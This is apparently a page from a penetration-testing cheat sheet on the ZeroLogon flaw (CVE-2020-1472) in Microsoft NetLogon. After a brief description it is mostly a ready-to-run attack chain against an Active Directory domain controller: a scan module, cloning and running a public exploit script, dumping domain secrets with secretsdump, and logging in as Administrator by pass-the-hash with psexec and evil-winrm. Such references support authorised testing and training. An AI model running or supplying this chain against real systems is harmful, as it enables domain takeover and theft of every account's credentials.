ZeroLogon - CVE-2020-1472

Zero Logon exploits a feature of MS-NRPC (Microsoft NetLogon Remote Protocol), a critical authentication component of Active Directory that handles authentication of user and machine accounts. This attack is made possible by a bad implementation of the cryptography.
Release Date: Sep, 2020
Impact: Elevation of Privilege
CVSS score: 10

Scan | Exploit

# scan
nxc smb $ip -u $user -p $password -M zerologon

# exploit
git clone https://github.com/dirkjanm/CVE-2020-1472.git
cd CVE-2020-1472/
python3 cve-2020-1472-exploit.py $dc_netbios_name $dc_ip

secretsdump.py -just-dc -no-pass $dc_netbios_name\$@$dc_ip
# extract administrator hash

# connect
psexec.py Administrator:@$dc_ip -hashes $hash_admin
evil-winrm -i $dc_ip -u Administrator -H $NTLM_hash

PreviousnoPac - CVE-2021-42278 NextLocalPotato - CVE-2023-21746

Last updated 11 months ago